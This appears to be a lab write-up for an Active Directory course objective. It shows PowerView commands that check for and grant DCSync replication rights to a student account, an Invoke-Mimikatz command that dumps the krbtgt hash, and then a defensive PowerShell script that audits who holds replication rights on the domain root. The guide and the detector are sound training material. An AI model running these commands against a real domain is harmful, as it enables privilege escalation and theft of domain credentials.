Obj 12 DCSync

Task - Check if the student has Replication (DCSync) rights. If yes, execute the DCSync attack to pull the hashes of the krbtgt user. If no, add the replication rights for the student and then execute the DCSync attack.

Check to see if the user has replication rights

We are going to start from an elevated shell, run InviShell and load PowerView.ps1.

Now we can run the following command to see if the user has replication rights (the DS-Replication-Get-Changes family of extended rights, or GenericAll, on the domain object):

Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentx"}

- IF USER DOES NOT HAVE REPLICATION RIGHTS -

If the user does not have them, we can add the replication rights to the user. We need to start a new process on the user machine, run InviShell and load PowerView.ps1, then run:

Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity studentx -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

We can now go back to our other shell and re-run the check to confirm that the replication rights are in place:

Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentx"}

Once our user has replication rights, we can use the DCSync attack to dump the credentials of the krbtgt user:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
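The ACEs that the check above looks for, and that Add-DomainObjectAcl writes, are exactly what a defender should audit on the domain root. The following script is an added example, not part of the original lab page or of PowerView: it enumerates every principal holding a DCSync-capable right on the domain naming context using only the built-in [ADSI] accelerator, and flags anything outside a baseline allowlist. The baseline pattern is an assumption to tune per environment, and the DN defaults to the lab domain used above.

```powershell
param([string]$DomainDN = 'DC=dollarcorp,DC=moneycorp,DC=local')

# Control-access right GUIDs that together permit DCSync-style replication.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# Principals normally expected to hold these rights (assumption; adjust to your own baseline).
$Baseline = '^(BUILTIN\\Administrators|NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS|.+\\Domain Controllers|.+\\Enterprise Read-only Domain Controllers)$'

# Read the DACL of the domain object itself (explicit and inherited allow ACEs).
$root  = [ADSI]"LDAP://$DomainDN"
$rules = $root.psbase.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])

$findings = foreach ($rule in $rules) {
    if ($rule.AccessControlType -ne 'Allow') { continue }

    $guid   = $rule.ObjectType.ToString().ToLower()
    $isRepl = $ReplicationRights.ContainsKey($guid)
    # GenericAll on the domain object implies every extended right, replication included.
    $isGenericAll = $rule.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll)
    if (-not ($isRepl -or $isGenericAll)) { continue }

    # Resolve the SID to a name; fall back to the raw SID if it no longer resolves (orphaned ACE).
    $sid = $rule.IdentityReference
    try { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $name = $sid.Value }

    [pscustomobject]@{
        Principal  = $name
        Right      = if ($isRepl) { $ReplicationRights[$guid] } else { 'GenericAll' }
        Inherited  = $rule.IsInherited
        InBaseline = [bool]($name -match $Baseline)
    }
}

$findings | Sort-Object InBaseline, Principal | Format-Table -AutoSize

$unexpected = @($findings | Where-Object { -not $_.InBaseline })
if ($unexpected.Count -gt 0) {
    Write-Warning "$($unexpected.Count) principal(s) outside the baseline hold DCSync-capable rights on $DomainDN"
}
```

Run it from a domain-joined host with an account that can read the domain root DACL; a lab user granted rights with Add-DomainObjectAcl appears here as a non-baseline finding with explicit, non-inherited ACEs.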
